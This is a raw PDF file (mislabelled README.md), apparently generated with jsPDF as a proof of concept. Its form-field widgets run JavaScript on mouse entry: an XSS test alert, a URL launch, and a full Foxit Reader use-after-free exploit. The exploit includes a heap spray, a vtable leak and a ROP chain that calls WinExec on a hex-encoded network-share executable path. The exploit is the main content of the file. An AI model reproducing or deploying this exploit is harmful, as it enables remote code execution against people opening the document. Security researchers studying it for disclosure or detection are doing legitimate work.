README.md
Rendering markdown...
%PDF-1.3
%�߬�
3 0 obj
<</Type /Page
/Parent 1 0 R
/Resources 2 0 R
/MediaBox [0 0 595.2799999999999727 841.8899999999999864]
/Annots [
5 0 R
6 0 R
7 0 R
8 0 R
]
/Contents 4 0 R
>>
endobj
4 0 obj
<<
/Length 24
>>
stream
0.5670000000000001 w
0 G
endstream
endobj
1 0 obj
<</Type /Pages
/Kids [3 0 R ]
/Count 1
>>
endobj
9 0 obj
<<
/Fields [5 0 R 6 0 R 7 0 R 8 0 R]
>>
endobj
5 0 obj
<<
/F 4
/Ff 32768
/Rect [28.35 785.2 85.04 813.54]
/FT /Btn
/T (FieldObject0)
/DA (/F1 0 Tf 0. g)
/Type /Annot
/Subtype /Widget
/Kids [6 0 R 7 0 R 8 0 R]
>>
endobj
6 0 obj
<<
/F 4
/Rect [28.35 785.2 85.04 813.54]
/V (opt1)
/Type /Annot
/Subtype /Widget
/Parent 5 0 R
/MK <<
/CA (l)
>>
/AS /Off /AA << /E << /S /JavaScript /JS ( app.alert('XSS')) >> >>
/AP <<
/D <</Off 10 0 R /undefined 11 0 R >>/N <</undefined 12 0 R >>>>
>>
endobj
7 0 obj
<<
/F 4
/Rect [113.39 785.2 141.73 813.54]
/V (opt2)
/Type /Annot
/Subtype /Widget
/Parent 5 0 R
/MK <<
/CA (l)
>>
/AS /Off /AA << /E << /S /JavaScript /JS ( app.launchURL("https://github.com/dajneem23", true); ) >> >>
/AP <<
/D <</Off 13 0 R /undefined 14 0 R >>/N <</undefined 15 0 R >>>>
>>
endobj
8 0 obj
<<
/F 4
/Rect [170.08 785.2 255.12 813.54]
/V (opt3)
/Type /Annot
/Subtype /Widget
/Parent 5 0 R
/MK <<
/CA (l)
>>
/AS /Off /AA << /E << /S /JavaScript /JS (
var heap_ptr = 0;
var foxit_base = 0;
var pwn_array = [];
function prepare_heap(size){
var arr = new Array(size);
for(var i = 0; i < size; i++){
arr[i] = this.addAnnot({type: "Text"});;
if (typeof arr[i] == "object"){
arr[i].destroy();
}
}
}
function gc() {
const maxMallocBytes = 128 * 0x100000;
for (var i = 0; i < 3; i++) {
var x = new ArrayBuffer(maxMallocBytes);
}
}
function alloc_at_leak(){
for (var i = 0; i < 0x64; i++){
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
}
}
function control_memory(){
for (var i = 0; i < 0x64; i++){
for (var j = 0; j < pwn_array[i].length; j++){
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
}
}
}
function leak_vtable(){
var a = this.addAnnot({type: "Text"});
a.destroy();
gc();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
var leaked = stolen[0] & 0xffff0000;
foxit_base = leaked - 0x01f50000;
}
function leak_heap_chunk(){
var a = this.addAnnot({type: "Text"});
a.destroy();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
alloc_at_leak();
heap_ptr = stolen[1];
}
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
rop[0x02] = 0x72727272; // junk
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
rop[0x04] = 0xffffffff; // ret of WinExec
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
//Path to executable
rop[0x0c] = 0x39315c5c;
rop[0x0d] = 0x36312e32;
rop[0x0e] = 0x2e312e38;
rop[0x0f] = 0x735c3031;
rop[0x10] = 0x65726168;
rop[0x11] = 0x6568735c;
rop[0x12] = 0x652e6c6c;
rop[0x13] = 0x00006578;
rop[0x14] = 0x00000000;
rop[0x15] = 0x00000000;
rop[0x16] = 0x00000000;
//End Path to executable
rop[0x17] = 0x00000000; // adios, amigo
}
}
function trigger_uaf(){
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
that.getAnnot(0, "uaf").destroy();
reclaim();
return 1;
}
}
});
a.point = arr;
}
function main(){
leak_heap_chunk();
leak_vtable();
control_memory();
trigger_uaf();
}
// app.alert(app.isFoxit)
if (app.platform == "WIN"){
if (app.isFoxit == "Foxit Reader"){
main();
}
}
if (app.platform == "MAC"){
// if (app.isFoxit == "Foxit PDF Reader for Mac"){
app.alert("This PoC is not tested on Mac, but it is likely vulnerable as well. Please test and confirm.");
// }
}
) >> >>
/AP <<
/D <</Off 16 0 R /undefined 17 0 R >>/N <</undefined 18 0 R >>>>
>>
endobj
10 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 56.69 28.35]
/Resources 2 0 R
/Length 243
>>
stream
0.749023 g
q
1 0 0 1 28.34646 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
endstream
endobj
11 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 56.69 28.35]
/Resources 2 0 R
/Length 480
>>
stream
0.749023 g
q
1 0 0 1 28.34646 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
0 g
q
1 0 0 1 28.34646 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
12 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 56.69 28.35]
/Resources 2 0 R
/Length 232
>>
stream
q
1 0 0 1 28.34646 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
13 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 28.35 28.35]
/Resources 2 0 R
/Length 243
>>
stream
0.749023 g
q
1 0 0 1 14.17323 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
endstream
endobj
14 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 28.35 28.35]
/Resources 2 0 R
/Length 480
>>
stream
0.749023 g
q
1 0 0 1 14.17323 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
0 g
q
1 0 0 1 14.17323 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
15 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 28.35 28.35]
/Resources 2 0 R
/Length 232
>>
stream
q
1 0 0 1 14.17323 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
16 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 85.04 28.35]
/Resources 2 0 R
/Length 243
>>
stream
0.749023 g
q
1 0 0 1 42.51969 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
endstream
endobj
17 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 85.04 28.35]
/Resources 2 0 R
/Length 480
>>
stream
0.749023 g
q
1 0 0 1 42.51969 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
0 g
q
1 0 0 1 42.51969 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
18 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 85.04 28.35]
/Resources 2 0 R
/Length 232
>>
stream
q
1 0 0 1 42.51969 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
19 0 obj
<<
/Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
20 0 obj
<<
/Type /Font
/BaseFont /Helvetica-Bold
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
21 0 obj
<<
/Type /Font
/BaseFont /Helvetica-Oblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
22 0 obj
<<
/Type /Font
/BaseFont /Helvetica-BoldOblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
23 0 obj
<<
/Type /Font
/BaseFont /Courier
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
24 0 obj
<<
/Type /Font
/BaseFont /Courier-Bold
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
25 0 obj
<<
/Type /Font
/BaseFont /Courier-Oblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
26 0 obj
<<
/Type /Font
/BaseFont /Courier-BoldOblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
27 0 obj
<<
/Type /Font
/BaseFont /Times-Roman
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
28 0 obj
<<
/Type /Font
/BaseFont /Times-Bold
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
29 0 obj
<<
/Type /Font
/BaseFont /Times-Italic
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
30 0 obj
<<
/Type /Font
/BaseFont /Times-BoldItalic
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
31 0 obj
<<
/Type /Font
/BaseFont /ZapfDingbats
/Subtype /Type1
/FirstChar 32
/LastChar 255
>>
endobj
32 0 obj
<<
/Type /Font
/BaseFont /Symbol
/Subtype /Type1
/FirstChar 32
/LastChar 255
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 19 0 R
/F2 20 0 R
/F3 21 0 R
/F4 22 0 R
/F5 23 0 R
/F6 24 0 R
/F7 25 0 R
/F8 26 0 R
/F9 27 0 R
/F10 28 0 R
/F11 29 0 R
/F12 30 0 R
/F13 31 0 R
/F14 32 0 R
>>
/XObject <<
>>
>>
endobj
33 0 obj
<<
/Producer (jsPDF 4.1.0)
/CreationDate (D:20260227114239+07'00')
>>
endobj
34 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/OpenAction [3 0 R /FitH null]
/PageLayout /OneColumn
/AcroForm 9 0 R
>>
endobj
xref
0 35
0000000000 65535 f
0000000270 00000 n
0000010757 00000 n
0000000015 00000 n
0000000196 00000 n
0000000382 00000 n
0000000554 00000 n
0000000824 00000 n
0000001133 00000 n
0000000327 00000 n
0000004912 00000 n
0000005290 00000 n
0000005905 00000 n
0000006272 00000 n
0000006650 00000 n
0000007265 00000 n
0000007632 00000 n
0000008010 00000 n
0000008625 00000 n
0000008992 00000 n
0000009118 00000 n
0000009249 00000 n
0000009383 00000 n
0000009521 00000 n
0000009645 00000 n
0000009774 00000 n
0000009906 00000 n
0000010042 00000 n
0000010170 00000 n
0000010297 00000 n
0000010426 00000 n
0000010559 00000 n
0000010661 00000 n
0000011010 00000 n
0000011096 00000 n
trailer
<<
/Size 35
/Root 34 0 R
/Info 33 0 R
/ID [ <CC7E51DFEA11268056681AE6399CB174> <CC7E51DFEA11268056681AE6399CB174> ]
>>
startxref
11216
%%EOF